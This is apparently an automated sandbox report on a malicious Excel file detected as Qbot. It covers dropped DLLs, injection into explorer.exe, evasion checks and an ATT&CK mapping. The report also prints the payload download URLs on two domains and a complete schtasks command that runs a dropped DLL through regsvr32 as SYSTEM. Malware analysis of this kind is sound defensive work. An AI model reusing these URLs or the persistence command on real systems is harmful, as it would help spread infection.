          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\gihi2.dllJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn wtdsqwcv /tr 'regsvr32.exe -s \'C:\Users\user\gihi1.dll\'' /SC ONCE /Z /ST 20:54 /ET 21:06
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_10002297 StartServiceCtrlDispatcherA,

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5800 base: 136F380 value: E9 83 38 D9 FF
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 7024 base: 136F380 value: E9 83 38 2F FF
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to evade analysis by execution special instruction which cause usermode exceptionShow sources
          Source: C:\Windows\SysWOW64\WerFault.exeSpecial instruction interceptor: First address: 0000000066AA11EF instructions 0FC7C8 caused by: Known instruction #UD exception
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\ka[1].htmJump to dropped file
          Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htmJump to dropped file
          Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
          Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6272Thread sleep count: 128 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5804Thread sleep time: -112000s >= -30000s
          Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6536Thread sleep count: 131 > 30
          Source: C:\Windows\SysWOW64\explorer.exe TID: 7084Thread sleep count: 70 > 30
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000BB22 FindFirstFileW,FindNextFileW,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000EB53 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,
          Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: WerFault.exe, 0000000F.00000002.729755635.0000000003D60000.00000002.00000001.sdmp, WerFault.exe, 0000001F.00000002.956241658.00000000036C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000E5F3 LoadLibraryA,GetProcAddress,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_010D1000 push dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4_2_01102A6B RtlAddVectoredExceptionHandler,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Allocates memory in foreign processesShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 1130000 protect: page read and write
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: 690000 protect: page read and write
          Injects code into the Windows Explorer (explorer.exe)Show sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5800 base: 1130000 value: 9C
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 5800 base: 136F380 value: E9
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 7024 base: 690000 value: 9C
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 7024 base: 136F380 value: E9
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 1130000
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 136F380
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 690000
          Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 136F380
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000002.975069600.0000000003F00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000B036 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1001354E LookupAccountNameW,LookupAccountNameW,LookupAccountNameW,
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000EB53 GetCurrentProcessId,GetTickCount,GetModuleFileNameW,GetCurrentProcess,LookupAccountSidW,GetLastError,GetSystemMetrics,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,GetSystemInfo,GetWindowsDirectoryW,

          Stealing of Sensitive Information:

          barindex
          Yara detected QbotShow sources
          Source: Yara matchFile source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected QbotShow sources
          Source: Yara matchFile source: 00000006.00000002.711643542.0000000000F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.700614054.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.10000000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.explorer.exe.1100000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.1120000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.f30000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.regsvr32.exe.f30000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.regsvr32.exe.1120000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 13.2.explorer.exe.660000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting2DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Credential API Hooking1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API3Windows Service3Windows Service3Scripting2LSASS MemoryAccount Discovery1Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution43Scheduled Task/Job1Process Injection412Obfuscated Files or Information1Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsScheduled Task/Job1Logon Script (Mac)Scheduled Task/Job1Software Packing1NTDSSystem Information Discovery115Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsService Execution2Network Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsSecurity Software Discovery111SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading131Cached Domain CredentialsVirtualization/Sandbox Evasion2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection412Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Regsvr321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 440113 Sample: plan-1053707320.xlsb Startdate: 24/06/2021 Architecture: WINDOWS Score: 100 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 61 10 other signatures 2->61 9 EXCEL.EXE 35 45 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 51 gruasphenbogota.com 50.116.92.246, 443, 49739, 49742 UNIFIEDLAYER-AS-1US United States 9->51 53 carpascapital.com 9->53 41 C:\Users\user\AppData\Local\...\ka[1].htm, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\...\ka[1].htm, PE32 9->43 dropped 45 C:\Users\user\...\~$plan-1053707320.xlsb, data 9->45 dropped 73 Document exploit detected (creates forbidden files) 9->73 75 Document exploit detected (UrlDownloadToFile) 9->75 18 regsvr32.exe 9->18         started        21 regsvr32.exe 9->21         started        23 regsvr32.exe 14->23         started        25 regsvr32.exe 16->25         started        file5 signatures6 process7 signatures8 63 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->63 65 Injects code into the Windows Explorer (explorer.exe) 18->65 67 Writes to foreign memory regions 18->67 27 explorer.exe 8 1 18->27         started        69 Allocates memory in foreign processes 21->69 71 Maps a DLL or memory area into another process 21->71 31 explorer.exe 21->31         started        33 WerFault.exe 20 9 23->33         started        35 WerFault.exe 9 25->35         started        process9 file10 47 C:\Users\user\gihi1.dll, PE32 27->47 dropped 77 Drops PE files to the user root directory 27->77 79 Uses schtasks.exe or at.exe to add and modify task schedules 27->79 37 schtasks.exe 1 27->37         started        49 C:\Users\user\gihi2.dll, PE32 31->49 dropped 81 Tries to evade analysis by execution special instruction which cause usermode exception 33->81 signatures11 process12 process13 39 conhost.exe 37->39         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          plan-1053707320.xlsb26%VirustotalBrowse
          plan-1053707320.xlsb28%ReversingLabsDocument-Excel.Downloader.EncDoc

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm100%Joe Sandbox ML
          C:\Users\user\gihi1.dll100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\ka[1].htm100%Joe Sandbox ML
          C:\Users\user\gihi2.dll100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.regsvr32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
          4.2.explorer.exe.1100000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
          3.2.regsvr32.exe.10000000.3.unpack100%AviraTR/Crypt.XPACK.Gen3Download File
          13.2.explorer.exe.660000.0.unpack100%AviraTR/Crypt.XPACK.Gen3Download File

          Domains

          SourceDetectionScannerLabelLink
          carpascapital.com2%VirustotalBrowse
          gruasphenbogota.com2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.entity.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://cdn.entity.0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://powerlift.acompli.net0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://cortana.ai0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://api.aadrm.com/0%URL Reputationsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
          https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
          https://gruasphenbogota.com/C74hwGGxi/ka.html0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
          https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://store.office.cn/addinstemplate0%URL Reputationsafe
          https://store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://store.officeppe.com/addinstemplate0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://www.odwebp.svc.ms0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://dataservice.o365filtering.com/0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://ncus.contentsync.0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://apis.live.net/v5.0/0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://wus2.contentsync.0%URL Reputationsafe
          https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
          https://carpascapital.com/gBPg8MtsGbv/ka.html%0%Avira URL Cloudsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
          https://ncus.pagecontentsync.0%URL Reputationsafe
          https://ncus.pagecontentsync.0%URL Reputationsafe
          https://ncus.pagecontentsync.0%URL Reputationsafe
          https://skyapi.live.net/Activity/0%URL Reputationsafe
          https://skyapi.live.net/Activity/0%URL Reputationsafe
          https://skyapi.live.net/Activity/0%URL Reputationsafe
          https://dataservice.o365filtering.com0%URL Reputationsafe
          https://dataservice.o365filtering.com0%URL Reputationsafe
          https://dataservice.o365filtering.com0%URL Reputationsafe
          https://api.cortana.ai0%URL Reputationsafe
          https://api.cortana.ai0%URL Reputationsafe
          https://api.cortana.ai0%URL Reputationsafe
          https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
          https://directory.services.0%URL Reputationsafe
          https://directory.services.0%URL Reputationsafe
          https://directory.services.0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          carpascapital.com
          50.116.92.246
          truefalseunknown
          gruasphenbogota.com
          50.116.92.246
          truefalseunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://api.diagnosticssdf.office.comA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
            high
            https://login.microsoftonline.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
              high
              https://shell.suite.office.com:1443A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                  high
                  https://autodiscover-s.outlook.com/A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                    high
                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrA1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
                      high
                      https://cdn.entity.A1BC798F-5F72-4EA3-BE7B-898818256BFB.0.drfalse
